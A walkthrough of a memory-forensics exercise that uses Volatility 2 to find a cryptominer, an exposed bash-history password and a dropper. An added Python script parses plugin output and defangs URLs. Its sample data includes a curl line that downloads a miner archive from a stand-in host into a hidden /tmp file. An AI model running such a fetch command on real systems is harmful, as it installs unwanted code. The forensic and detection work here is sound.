Memory forensics CrypTOYminers Sing Volala-lala-latility
Learning Objectives
Understand what memory forensics is and how to use it in a digital forensics investigation
Understand what volatile data and memory dumps are
Learn about Volatility and how it can be used to analyse a memory dump
Learn about Volatility profiles
Memory forensics, also known as volatile memory analysis or random access memory (RAM) forensics, is a branch of digital forensics.
It involves the examination and analysis of a computer's volatile memory (RAM) to uncover digital evidence and artefacts related to computer security incidents, cybercrimes, and other forensic investigations.
This data is volatile because it does not survive a power-off or reboot, which is why the memory image has to be captured while the machine is still running.
This room is again a very straightforward one, with all commands and instructions already given; we just need to follow along and run them. The one thing that has to be right is the profile passed with --profile, which must match the kernel of the dumped machine (here LinuxUbuntu_5_4_0-163-generic_profilex64), otherwise the plugins cannot walk the kernel structures and return nothing useful.
What is the exposed password that we find from the bash history output?
[REDACTED]
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_bash
Volatility Foundation Volatility Framework 2.6.1
Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
   10205 bash                 2023-10-02 18:19:58 UTC+0000   mysql -u root -p'REDACTED'
What is the PID of the miner process that we find?
[REDACTED]
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_pslist
Volatility Foundation Volatility Framework 2.6.1
Offset             Name                 Pid             PPid            Uid             Gid    DTB                Start Time
------------------ -------------------- --------------- --------------- --------------- ------ ------------------ ----------
0xffff9ce9b1e4c680 REDACTED             REDACTED        1               1000            1000   0x0000000074fa2000 2023-10-02 18:22:37 UTC+0000
0xffff9ce9bc23af00 mysqlserver          10291           1               1000            1000   0x000000006f166000 2023-10-02 18:22:37 UTC+0000
Both entries stand out in the full listing for the same reasons: they run as uid 1000 rather than root, they have been re-parented to PID 1 (their real parent has already exited), and they started in the same second, which is the footprint of one dropper launching both.
What is the MD5 hash of the miner process?
[REDACTED]
The files under extracted/ are the process images written by the linux_procdump plugin, which names each dump <process name>.<PID>.<base address>.
ubuntu@volatility:~/Desktop/Evidence$ md5sum extracted/miner.PID.0x400000
REDACTED extracted/miner.PID.0x400000
What is the MD5 hash of the mysqlserver process?
[REDACTED]
ubuntu@volatility:~/Desktop/Evidence$ md5sum extracted/mysqlserver.10291.0x400000
REDACTED extracted/mysqlserver.10291.0x400000
Use the command strings extracted/miner.<PID from question 2>.0x400000 | grep http://. What is the suspicious URL? (Fully defang the URL using CyberChef)
[REDACTED]
strings extracted/miner.<PID from question 2>.0x400000 | grep http://
After reading the elfie file, where on the file system is the mysqlserver process dropped?
[REDACTED]
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_find_file -i 0xffff9ce9b78280e8 -O extracted/elfie
ubuntu@volatility:~/Desktop/Evidence$ cat extracted/elfie
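The whole room is a chain of Volatility 2 plugin calls followed by reading their text output by hand. As an added example (not part of the room and not Volatility's own code), the Python below automates that reading offline: it parses linux_pslist and linux_bash output, flags non-root processes re-parented to PID 1 that started in the same second, pulls inline passwords out of bash history, emulates strings | grep http:// over a dumped process image, and fully defangs what it finds the way CyberChef's Defang URL operation does with its dot, http and :// escapes enabled. The plugin output, PIDs, offsets, password and URL embedded in it are constructed for the example and are not the room's redacted values.

```python
import re
from collections import defaultdict

# --- Constructed sample data (not the room's redacted values) -----------------
# Modelled on the Volatility 2 linux_pslist / linux_bash output shown above.
# PIDs, offsets, the password and the URL are invented for this example.
SAMPLE_PSLIST = """\
Volatility Foundation Volatility Framework 2.6.1
Offset             Name                 Pid             PPid            Uid             Gid    DTB                Start Time
------------------ -------------------- --------------- --------------- --------------- ------ ------------------ ----------
0xffff9ce9b0000000 systemd              1               0               0               0      0x0000000000000000 2023-10-02 18:10:01 UTC+0000
0xffff9ce9b1e4c680 miner                10280           1               1000            1000   0x0000000074fa2000 2023-10-02 18:22:37 UTC+0000
0xffff9ce9bc23af00 mysqlserver          10291           1               1000            1000   0x000000006f166000 2023-10-02 18:22:37 UTC+0000
0xffff9ce9b3333333 bash                 10205           10100           1000            1000   0x0000000022222222 2023-10-02 18:19:00 UTC+0000
"""

SAMPLE_BASH = """\
Volatility Foundation Volatility Framework 2.6.1
Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
   10205 bash                 2023-10-02 18:19:58 UTC+0000   mysql -u root -p'S3cret!'
   10205 bash                 2023-10-02 18:20:10 UTC+0000   ls -la /tmp
"""

# A made-up fragment of a dumped process image: ELF magic, padding, two strings.
SAMPLE_MINER_BYTES = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"curl -s http://example.invalid/xmrig.tar.gz -o /tmp/.x\x00"
    + b"/usr/bin/mysqlserver\x00"
    + b"\x01\x02ab"  # run shorter than 4 printable bytes: ignored, as strings(1) would
)

PSLIST_ROW = re.compile(
    r"^(0x[0-9a-f]+)\s+(.+?)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(0x[0-9a-f]+)\s+(.+?)\s*$"
)
BASH_ROW = re.compile(
    r"^\s*(\d+)\s+(\S+)\s+(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} UTC[+-]\d{4})\s+(.*?)\s*$"
)
# Inline password forms seen in shell history: -p'secret', -psecret, --password=secret.
# Quoted forms are tried first so the quotes themselves are not captured.
PASSWORD_ARG = re.compile(r"(?:-p|--password=)(?:'([^']*)'|\"([^\"]*)\"|(\S+))")


def parse_pslist(text):
    """Parse linux_pslist rows into dicts; banner, header and dash lines are skipped."""
    procs = []
    for line in text.splitlines():
        m = PSLIST_ROW.match(line)
        if not m:
            continue
        offset, name, pid, ppid, uid, gid, dtb, start = m.groups()
        procs.append({"offset": offset, "name": name, "pid": int(pid),
                      "ppid": int(ppid), "uid": int(uid), "gid": int(gid),
                      "dtb": dtb, "start": start})
    return procs


def parse_bash(text):
    """Parse linux_bash rows into (pid, shell, timestamp, command) tuples."""
    rows = []
    for line in text.splitlines():
        m = BASH_ROW.match(line)
        if m:
            pid, shell, when, cmd = m.groups()
            rows.append((int(pid), shell, when, cmd))
    return rows


def daemonised_siblings(procs):
    """Group non-root processes re-parented to init (PPid 1) by start time.

    A dropper that forks its payloads and exits leaves exactly this pattern:
    siblings owned by the same unprivileged user, parent PID 1, started in the
    same second. Returns {start_time: [sorted names]} for groups of two or more.
    """
    groups = defaultdict(list)
    for p in procs:
        if p["ppid"] == 1 and p["uid"] != 0:
            groups[p["start"]].append(p["name"])
    return {t: sorted(names) for t, names in groups.items() if len(names) > 1}


def exposed_passwords(bash_rows):
    """Return (program, password) pairs for history entries carrying an inline password."""
    found = []
    for _pid, _shell, _when, cmd in bash_rows:
        m = PASSWORD_ARG.search(cmd)
        if m:
            found.append((cmd.split()[0], next(g for g in m.groups() if g is not None)))
    return found


def extract_urls(blob, min_len=4):
    """Emulate `strings | grep http://` over a process dump.

    Printable-ASCII runs of at least min_len bytes are treated as strings, then
    every http(s) URL inside them is collected in order without duplicates.
    """
    urls = []
    for run in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob):
        for url in re.findall(r"https?://[^\s\"'<>]+", run.decode("ascii")):
            if url not in urls:
                urls.append(url)
    return urls


def defang(url):
    """Fully defang a URL: http -> hxxp, :// -> [://], . -> [.] so it cannot be clicked."""
    return url.replace("http", "hxxp").replace("://", "[://]").replace(".", "[.]")


if __name__ == "__main__":
    procs = parse_pslist(SAMPLE_PSLIST)
    for when, names in daemonised_siblings(procs).items():
        print(f"[!] spawned together at {when}: {', '.join(names)}")
    for prog, pw in exposed_passwords(parse_bash(SAMPLE_BASH)):
        print(f"[!] password on the {prog} command line: {pw}")
    for url in extract_urls(SAMPLE_MINER_BYTES):
        print(f"[!] URL in dump: {defang(url)}")
```

On a real case, feed the functions the saved plugin output (vol.py ... linux_pslist > pslist.txt) and the linux_procdump file instead of the constructed samples; the parsers key on the row shapes Volatility 2 prints, not on column positions, so names containing spaces still parse.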